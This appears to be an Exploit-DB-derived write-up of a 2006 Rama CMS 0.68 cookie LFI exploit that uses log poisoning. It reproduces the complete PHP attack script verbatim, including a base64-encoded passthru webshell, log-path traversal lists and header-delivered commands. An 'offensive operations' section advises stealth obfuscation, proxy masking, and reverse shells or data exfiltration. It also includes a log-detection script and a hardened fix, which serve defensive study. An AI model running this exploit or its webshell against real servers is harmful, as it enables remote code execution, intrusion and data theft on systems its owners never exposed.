Exploiting Rama CMS 0.68: A Deep Dive into Cookie-Based Local File Inclusion

What this paper is
This paper details a Local File Inclusion (LFI) vulnerability in Rama CMS version 0.68. The vulnerability is triggered by manipulating the lang cookie. By crafting a specific cookie value, an attacker can trick the application into including arbitrary local files, which can then be used to execute commands. The exploit provided is a PHP script designed to automate the discovery and exploitation of this vulnerability.
Simple technical breakdown
The core of the vulnerability lies in how Rama CMS handles language settings.
- Cookie Handling: The application checks for a lang cookie. If it exists, it uses its value to set a $lang variable.
- File Inclusion: The application then attempts to include a PHP file from the language/ directory based on the $lang variable. For example, if $lang is "en", it tries to include language/en.php.
- The Flaw: The vulnerability occurs because the application doesn't properly sanitize the value of the lang cookie before using it in the include_once() function. This allows an attacker to provide a path traversal sequence (like ../../..) within the cookie, pointing to files outside the intended language/ directory.
- Exploitation: The exploit leverages this by setting the lang cookie to a path traversal sequence followed by a target log file (e.g., ../../../../../var/log/httpd/access_log). The attacker also sends a request containing PHP code that the web server writes to that log. When the application includes the log file, it effectively includes the attacker's command, leading to Remote Code Execution (RCE).
Complete code and payload walkthrough
The provided PHP exploit script automates the process of finding and exploiting the LFI vulnerability.
1. Header and ASCII Art:
The script begins with a large ASCII art representation of "DEVIL TEAM" and some introductory messages, including team greetings and contact information. This is purely decorative and has no functional impact on the exploit.
2. Exploit Information:
/*
works with register_globals=On
in lang.php line 27-43:
....
if(isset($_GET['lang'])){
setcookie('lang',htmlspecialchars($_GET['lang']));
$lang = htmlspecialchars($_GET['lang']);
$_COOKIE['lang'] = $lang;
}else if(isset($_COOKIE['lang'])){ // <-------{1}
$lang = htmlspecialchars($_COOKIE['lang']);
}else{
$lang = DEFAUL_LANG;
$_COOKIE['lang'] = $lang; // <-------{2}
}
if(file_exists("language/$lang.php")){
include_once("language/$lang.php"); // <-------{3}
}else{
include_once("language/en.php");
}
?>
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Kacper ;)
*/
This comment block is crucial. It explains the vulnerability's origin within lang.php (lines 27-43). {1} points to where the script checks for an existing lang cookie. {2} shows the default language handling. {3} highlights the vulnerable include_once("language/$lang.php"); line. htmlspecialchars() is applied to the cookie value before it reaches include_once, but it only encodes HTML metacharacters (&, <, >, quotes); dots and slashes pass through unchanged, so it is insufficient to prevent path traversal. The comment also notes that this exploit relies on register_globals=On.
3. Command Line Argument Handling:
if ($argc<4) {
// ... usage instructions ...
die;
}
// ...
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
- This section checks that the required number of command-line arguments was provided and prints usage instructions otherwise.
- It parses the arguments:
  - $host: the target server's IP or hostname.
  - $path: the base path of the Rama CMS installation.
  - $cmd: the shell command to execute (e.g., ls -la); every argument that is not an option is appended to it.
  - -p[port]: an optional argument to specify a non-default HTTP port.
  - -P[ip:port]: an optional argument to specify an HTTP proxy.
- $p is constructed based on whether a proxy is used: without a proxy it is just $path; with one it is the absolute URL http://host:port/path that a proxy expects.
4. Initialization and Helper Functions:
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function wyslij_pakiety($pakiet)
{
global $proxy, $host, $port, $html, $proxy_regex;
// ... socket connection logic ...
fputs($ock,$pakiet);
// ... HTML response reading logic ...
fclose($ock);
}
function quick_dump($string)
{
// ... hex/ascii dump formatting ...
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
- error_reporting(0) and the ini_set() calls silence errors, remove the script's execution time limit and set a 5-second socket timeout.
- wyslij_pakiety($pakiet) (Polish for "send packets"): sends a raw HTTP request, either directly to the target host or through the specified proxy, reads the response and stores it in the global $html variable.
- quick_dump($string): a utility that renders raw data as a hex/ASCII dump, useful for debugging.
- $proxy_regex: a regular expression used to validate the proxy address.
- make_seed(): generates a random seed; it is not used in the main exploit logic.
5. Payload Injection (Log Poisoning):
echo "[1] insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$pakiet="GET ".$p.$hauru." HTTP/1.0\r\n";
$pakiet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: close\r\n\r\n";
wyslij_pakiety($pakiet);
sleep(3);
$hauru is a Base64-encoded string. Decoding it yields the following PHP payload (the decoded bytes form a single line):
<?php ob_clean();//Ruchomy zamek Hauru ;-)echo"...Hacker..Kacper..Made..in..Poland!!...DEVIL.TEAM.the..best..polish..team..Greetz...";echo"...Go To DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";echo"...DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SERVER[HTTP_HAURU]);die;?>
This payload does the following:
- ob_clean(): discards any output already buffered, so the command output is not mixed with page content.
- The echo statements print greeting messages and team information. (The comment "Ruchomy zamek Hauru" is the Polish title of Howl's Moving Castle, which is where the "Hauru" marker name comes from.)
- ini_set("max_execution_time",0): removes the execution time limit.
- echo "Hauru";: prints the marker string "Hauru". This is important for later verification.
- passthru($_SERVER[HTTP_HAURU]);: the core command execution. It takes the value of the HAURU request header, which PHP exposes as $_SERVER['HTTP_HAURU'] (the payload writes the index without quotes; older PHP treats the bare word as the string 'HTTP_HAURU' and emits a notice), and runs it as a shell command.
- die;: terminates script execution.
- The script then constructs an HTTP GET request to the target path ($p) with the decoded $hauru payload appended. This request is sent using wyslij_pakiety(). The User-Agent header is also set to include the $hauru payload, which is a clever way to inject it into the web server's logs. The sleep(3) pauses execution, allowing the server to process the request and write to its logs.
6. Path Traversal and File Inclusion Loop:
$paths= array (
"../../../../../var/log/httpd/access_log",
// ... many other common log paths ...
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$pakiet ="GET ".$p."lang.php HTTP/1.1\r\n";
$pakiet.="Cookie: lang=../".$paths[$i]."%00;\r\n"; // <-- Vulnerable part
$pakiet.="HAURU: ".$cmd."\r\n"; // <-- Command injected here
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: Close\r\n\r\n";
wyslij_pakiety($pakiet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>
- $paths: an array containing a comprehensive list of common web server log file paths, each prefixed with path traversal sequences (../).
- The for loop iterates through each path in the $paths array. Inside the loop:
  - A new HTTP GET request is constructed targeting lang.php.
  - Cookie: lang=../".$paths[$i]."%00;: this is the critical part. The lang cookie is set to a path traversal sequence (../ repeated) followed by the current log file path from the $paths array. The %00 is a null byte, which in older PHP versions truncated the string passed to file functions and so cut off the ".php" suffix that lang.php appends; its effectiveness varies with the PHP version. The semicolon ; is part of the cookie syntax.
  - HAURU: ".$cmd."\r\n: the command to be executed ($cmd) is sent as the HAURU HTTP header. This header is read by the injected PHP payload (passthru($_SERVER['HTTP_HAURU'])).
  - The request is sent using wyslij_pakiety().
  - if (strstr($html,"Hauru")): the script checks whether the response ($html) contains the "Hauru" marker string echoed by the injected payload. If found, the payload was successfully included and executed.
  - $temp=explode("Hauru",$html); die($temp[1]);: the response is split on "Hauru", and the part after it (which should be the output of the executed command) is printed before the script terminates.
- If the loop completes without finding the "Hauru" marker, an error message is displayed.
Code Fragment/Block -> Practical Purpose Mapping:
- ASCII Art & Greetings: informational, team branding.
- Comment Block (lang.php logic): explains the vulnerability mechanism and prerequisites (register_globals=On).
- Argument Parsing ($argc, $argv): defines how the script takes target details and commands from the user.
- wyslij_pakiety() function: handles network communication (sending requests, receiving responses), abstracting the direct socket programming.
- Base64 Decoded Payload ($hauru): the actual PHP code injected into the server's logs, designed to execute commands via passthru.
- First wyslij_pakiety() call (Log Poisoning): injects the command-execution payload into the web server logs via the User-Agent header, hoping it will be logged.
- $paths array: a list of potential log file locations to attempt inclusion.
- Looping through $paths: iterates through possible LFI targets.
- Cookie: lang=../...%00;: the core LFI exploit vector, using path traversal to include arbitrary files.
- HAURU: $cmd header: delivers the command to the injected payload for execution.
- strstr($html,"Hauru") check: verifies successful command execution by looking for the payload's marker.
- explode("Hauru",$html); die($temp[1]);: extracts and displays the command output.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the target system itself. The exploit targets a web application accessible over HTTP/HTTPS.
- Lab Preconditions:
  - A target server running Rama CMS version 0.68 or earlier.
  - The web server must be configured with register_globals = On. This is a critical prerequisite and a significant security weakness in itself, common in older PHP applications.
  - The web server must be logging requests to a file that can be included via LFI. Common log files like access_log or error_log are targeted.
  - Network connectivity from the attacker's machine to the target web server (and to a proxy, if one is used).
- Tooling Assumptions:
  - A PHP interpreter to run the exploit script.
  - Basic network tools (like ping or traceroute) for initial reconnaissance.
  - A proxy server if the -P option is used.
- Execution Pitfalls:
  - register_globals = Off: If register_globals is disabled on the target server, the exploit will likely fail as the injected variables won't be automatically populated.
  - Incorrect Path: The $paths array contains common log locations. If the web server logs to a non-standard path, the exploit will fail to find the log file. Manual reconnaissance might be needed to identify the correct log path.
  - Web Application Firewall (WAF): WAFs might detect and block the crafted cookie or the HAURU header.
  - Null Byte Handling: Older PHP versions were more susceptible to null byte (%00) truncation. Newer versions might ignore or handle it differently, potentially breaking the exploit.
  - Log Rotation: If log files are rotated frequently, the injected payload might be written to a log file that is no longer accessible via the current path traversal.
  - Output Filtering: The web application might filter or sanitize the output of the passthru command, making it difficult to see the command's result.
  - Incorrect Target Path: If the $path argument is incorrect, the exploit will target the wrong location.
  - Firewall Rules: Network firewalls could block the connection to the target port.
- Tradecraft Considerations:
  - Stealth: The initial payload injection uses the User-Agent header, which is less suspicious than a direct GET parameter. However, the subsequent LFI requests are more overt.
  - Obfuscation: The exploit script itself is not heavily obfuscated. For more stealth, the PHP payload could be further obfuscated.
  - Proxy Usage: Using a proxy (-P option) can help mask the attacker's origin IP address.
  - Timing: The sleep(3) is a rudimentary delay. In a real engagement, timing might need to be adjusted based on server load or network latency.
  - Command Selection: The chosen command (ls -la) is for reconnaissance. For actual exploitation, commands like reverse shells or data exfiltration tools would be used. The output of these commands needs to be captured and exfiltrated.
  - Error Handling: The script's error handling is basic. A more sophisticated attacker might implement more robust error checking and retry mechanisms.
- Expected Telemetry:
  - Web Server Access Logs:
    - The initial request with the User-Agent containing the PHP payload.
    - Subsequent requests to lang.php with the crafted lang cookie and HAURU header (the cookie and custom header appear only if the log format records those request headers; the default combined format does not).
    - Entries corresponding to the injected payload in the log file being included (if the log file itself is accessible via HTTP).
  - Web Server Error Logs: Potential errors related to file inclusion failures, permission issues, or PHP execution errors.
  - Network Traffic: HTTP requests originating from the attacker's IP (or proxy IP) to the target web server.
  - Application Logs: If the application itself has logging, it might record the attempts or errors.
  - System Logs (on target): If the executed command interacts with the OS, system logs might show activity.
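Detection logic for the telemetry listed above, added here as an example and not part of the original paper. It assumes Apache combined-format access-log lines, optionally followed by one extra quoted field holding the Cookie request header (added with %{Cookie}i in LogFormat), because the default combined format does not record cookies and would show the LFI request only as a plain GET to lang.php; the sample lines and the helper names (combined_re, parse_line, indicators) are constructed.

```php
<?php
// Added detection example; not part of the original paper. Parses Apache
// combined-format lines, optionally followed by one more quoted field that
// carries the Cookie request header (%{Cookie}i in LogFormat), and tags both
// phases of this exploit: log poisoning (PHP code in the request line or
// User-Agent) and the lang-cookie LFI request itself.

/** Regex for one combined line; each quoted field may contain Apache's \" escapes. */
function combined_re(): string
{
    $q = '"((?:[^"\\\\]|\\\\.)*)"';
    return '/^(\S+) \S+ \S+ \[([^\]]+)\] ' . $q . ' (\d{3}) (\S+) ' . $q . ' ' . $q . '(?: ' . $q . ')?/';
}

/** Split one log line into named fields; null for lines that do not parse. */
function parse_line(string $line): ?array
{
    if (!preg_match(combined_re(), $line, $m)) {
        return null;
    }
    return [
        'ip' => $m[1], 'time' => $m[2], 'request' => $m[3], 'status' => (int) $m[4],
        'ua' => $m[7], 'cookie' => $m[8] ?? '',
    ];
}

/** Names of the indicators that fire for one parsed line (empty = nothing seen). */
function indicators(array $f): array
{
    $tags = [];
    $poison = $f['request'] . ' ' . $f['ua'];
    // Phase 1: text that becomes executable PHP once the log file is included.
    if (preg_match('/<\?(php\b|=)/i', $poison)) {
        $tags[] = 'php_open_tag';
    }
    if (preg_match('/\b(passthru|system|shell_exec|exec|eval)\s*\(/i', $poison)) {
        $tags[] = 'php_exec_function';
    }
    // Phase 2: a lang cookie that is not a language code (traversal, null byte).
    if (preg_match('/(?:^|;\s*)lang=([^;]*)/', $f['cookie'], $c)) {
        $value = $c[1];
        if (strpos($value, '../') !== false || stripos($value, '..%2f') !== false) {
            $tags[] = 'lang_cookie_traversal';
        }
        if (stripos($value, '%00') !== false || strpos($value, "\0") !== false) {
            $tags[] = 'lang_cookie_null_byte';
        }
        if (!preg_match('/\A[a-z]{2,3}\z/', $value)) {
            $tags[] = 'lang_cookie_not_a_code';
        }
    }
    // Traversal in the request URI is worth a tag on its own.
    if (preg_match('/\.\.(\/|%2f)/i', $f['request'])) {
        $tags[] = 'uri_traversal';
    }
    return $tags;
}

// Constructed sample lines: a poisoning request (PHP in URI and User-Agent),
// the LFI request with the Cookie header logged, and a benign request.
$samples = [
    '203.0.113.5 - - [12/Nov/2006:10:00:01 +0100] "GET /rama/<?php ob_clean(); HTTP/1.0" 400 226 "-" "<?php echo \"Hauru\";passthru($_SERVER[HTTP_HAURU]);?> Googlebot/2.1"',
    '203.0.113.5 - - [12/Nov/2006:10:00:05 +0100] "GET /rama/lang.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0" "lang=../../../../../../var/log/httpd/access_log%00"',
    '198.51.100.7 - - [12/Nov/2006:10:01:00 +0100] "GET /rama/index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0" "lang=pl"',
];

foreach ($samples as $line) {
    $f = parse_line($line);
    if ($f === null) {
        echo "unparsed: $line\n";
        continue;
    }
    $tags = indicators($f);
    echo $f['ip'], ' ', $f['request'], ' => ', $tags ? implode(', ', $tags) : 'clean', "\n";
}
```

Run from the CLI with php; the first sample fires the poisoning indicators, the second the cookie indicators, and the third reports clean.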
Where this was used and when
- Year: Published in 2006. This indicates the vulnerability was active and exploitable around that time.
- Context: Exploits for web applications like CMS platforms were very common in the mid-2000s. LFI vulnerabilities were a frequent attack vector, especially on PHP applications where register_globals was still enabled.
- Usage: This type of exploit would have been used by attackers to gain unauthorized access to web servers, deface websites, steal data, or use the compromised server as a pivot point for further attacks. It's a classic example of how insecure coding practices in web applications can lead to significant security breaches.
Defensive lessons for modern teams
- Disable register_globals: This is a fundamental security setting for PHP. It should always be turned off. Modern PHP versions have removed this directive entirely (it was dropped in PHP 5.4).
- Input Validation and Sanitization: Never trust user input, especially from cookies, GET, or POST parameters. Always validate and sanitize input thoroughly before using it in file operations, database queries, or command execution. Use functions like filter_var() and ensure paths are canonicalized and restricted to expected directories.
- Secure File Inclusion:
  - Avoid including files based on user-supplied input.
  - If file inclusion is necessary, use a whitelist of allowed files or paths.
  - Use functions like realpath() to resolve paths and prevent traversal.
  - Be cautious with include_once and require_once when the path is dynamic.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like LFI, SQL injection, and XSS.
- Regular Patching and Updates: Keep CMS platforms and all their components (including the underlying web server and PHP interpreter) updated to the latest secure versions. This vulnerability is in an old version of Rama CMS, highlighting the importance of migration.
- Secure Configuration: Ensure web server and application configurations are hardened, disabling unnecessary features and enabling security-related directives.
- Logging and Monitoring: Implement comprehensive logging for web server access and errors. Monitor these logs for suspicious activity, such as unusual requests, repeated LFI attempts, or unexpected file inclusions.
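A hardened replacement for the language-selection logic quoted from lang.php above, added here as an example; it is not Rama CMS code or a vendor patch. It assumes language files live in language/<code>.php next to the script, a default of en, and PHP 7.3 or later for the setcookie() options array; resolve_lang() is a name chosen for this example.

```php
<?php
// Hardened language selection: an added example, not Rama CMS code or a
// vendor patch. Assumptions: language files live in ./language/<code>.php,
// the default language is "en", and PHP >= 7.3 (setcookie() options array).
const DEFAULT_LANG = 'en';
const LANG_DIR = __DIR__ . '/language';

/**
 * Map an untrusted value (query string or cookie) to a language code that is
 * safe to include. Two independent checks: the value must look like a language
 * code, and it must name an existing file inside LANG_DIR. Neither "../" nor an
 * embedded null byte survives the first check; the second guarantees the final
 * path cannot leave the directory even if the first is ever loosened.
 */
function resolve_lang($requested): string
{
    if (!is_string($requested)) {
        return DEFAULT_LANG;
    }
    // Shape whitelist: two or three lowercase letters and nothing else.
    // \A and \z anchor the whole string, so "en\0..." and "../x" both fail.
    if (!preg_match('/\A[a-z]{2,3}\z/', $requested)) {
        return DEFAULT_LANG;
    }
    // Existence whitelist: realpath() canonicalises and returns false for a
    // missing file, so only a real language file gets through.
    $base = realpath(LANG_DIR);
    $candidate = realpath(LANG_DIR . '/' . $requested . '.php');
    if ($base === false || $candidate === false) {
        return DEFAULT_LANG;
    }
    // Belt and braces: the resolved file must sit directly under LANG_DIR.
    if (dirname($candidate) !== $base) {
        return DEFAULT_LANG;
    }
    return $requested;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs for a quick self-check from the command line; the
    // first two mirror the cookie shape the exploit above sends.
    $samples = [
        "../../../../../var/log/httpd/access_log\0",
        '../../../../../etc/passwd',
        'en<script>',
        'EN',
        'pl',
    ];
    foreach ($samples as $value) {
        printf("%-45s -> %s\n", addcslashes($value, "\0"), resolve_lang($value));
    }
} else {
    // Same precedence as the original: ?lang= overrides the cookie, which
    // overrides the default. Only the validated code is written back.
    $lang = resolve_lang($_GET['lang'] ?? $_COOKIE['lang'] ?? null);
    if (isset($_GET['lang'])) {
        setcookie('lang', $lang, ['httponly' => true, 'samesite' => 'Lax', 'path' => '/']);
    }
    // The include path is built from the validated code, never from raw input.
    include_once LANG_DIR . '/' . $lang . '.php';
}
```

In CLI mode every traversal sample collapses to the default; 'pl' survives only when language/pl.php actually exists, which is the point of the second check.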
ASCII visual (if applicable)
This exploit involves a chain of events. A simplified visual representation of the LFI part:
+-----------------+       +-----------------+       +-----------------+
| Attacker's Host | ----> |   Web Server    | ----> |  Rama CMS App   |
| (Exploit Script)|       | (Receives Req.) |       |   (lang.php)    |
+-----------------+       +-----------------+       +-----------------+
        |                                                    |
        | 1. Sends HTTP Req. with                            | 3. Reads 'lang' cookie
        |    Cookie: lang=../../log.txt%00;                  |    (e.g., ../../log.txt%00;)
        |    HAURU: <command>                                |
        |                                                    | 4. Tries to include
        |                                                    |    language/../../log.txt%00;.php
        |                                                    |    (path traversal occurs)
        |                                                    |
        |                                                    | 5. Includes target log file
        |                                                    |    (e.g., /var/log/access.log)
        |                                                    |    which contains injected payload
        |                                                    |
        |                                                    | 6. Injected payload executes
        |                                                    |    <command> via passthru() and
        |                                                    |    outputs "Hauru" + command result
        |                                                    |
        |<---------------------------------------------------+ 7. Response sent back containing
                                                               "Hauru" + command output
Explanation of the visual:
- The attacker sends a request to the web server.
- The request contains a crafted lang cookie and a HAURU header with the command.
- The Rama CMS application reads the lang cookie.
- It attempts to include_once a file based on the cookie value. Due to path traversal (../../), it escapes the language/ directory.
- The application successfully includes a target log file (which the attacker previously "poisoned" with a PHP payload).
- The included log file's content (the injected PHP payload) is executed. This payload uses passthru to run the command from the HAURU header and echoes a marker ("Hauru") followed by the command's output.
- The web server sends the response back to the attacker, containing the marker and the command's output, confirming successful execution.
Source references
- Paper URL: https://www.exploit-db.com/papers/2760
- Raw Exploit URL: https://www.exploit-db.com/raw/2760
- Exploit-DB Archive: Exploit-DB (exploit-db.com) is a public database of exploits, proof-of-concepts, and security research.
Original Exploit-DB Content (Verbatim)
<?
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: Rama CMS <= 0.68 (Cookie: lang) Local File Include Exploit
[Script name: Rama CMS v.0.68
[Script site: http://www.hotscripts.com/jump.php?listing_id=48318&jump_type=1
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky, xoron
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
works with register_globals=On
in lang.php line 27-43:
....
if(isset($_GET['lang'])){
setcookie('lang',htmlspecialchars($_GET['lang']));
$lang = htmlspecialchars($_GET['lang']);
$_COOKIE['lang'] = $lang;
}else if(isset($_COOKIE['lang'])){ // <-------{1}
$lang = htmlspecialchars($_COOKIE['lang']);
}else{
$lang = DEFAUL_LANG;
$_COOKIE['lang'] = $lang; // <-------{2}
}
if(file_exists("language/$lang.php")){
include_once("language/$lang.php"); // <-------{3}
}else{
include_once("language/en.php");
}
?>
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Kacper ;)
*/
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: Rama CMS path
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Rama_CMS/ ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / ls -la
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function wyslij_pakiety($pakiet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$pakiet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "[1] insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$pakiet="GET ".$p.$hauru." HTTP/1.0\r\n";
$pakiet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: close\r\n\r\n";
wyslij_pakiety($pakiet);
sleep(3);
$paths= array (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$pakiet ="GET ".$p."lang.php HTTP/1.1\r\n";
$pakiet.="Cookie: lang=../".$paths[$i]."%00;\r\n";
$pakiet.="HAURU: ".$cmd."\r\n";
$pakiet.="Host: ".$host."\r\n";
$pakiet.="Connection: Close\r\n\r\n";
wyslij_pakiety($pakiet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>
# milw0rm.com [2006-11-12]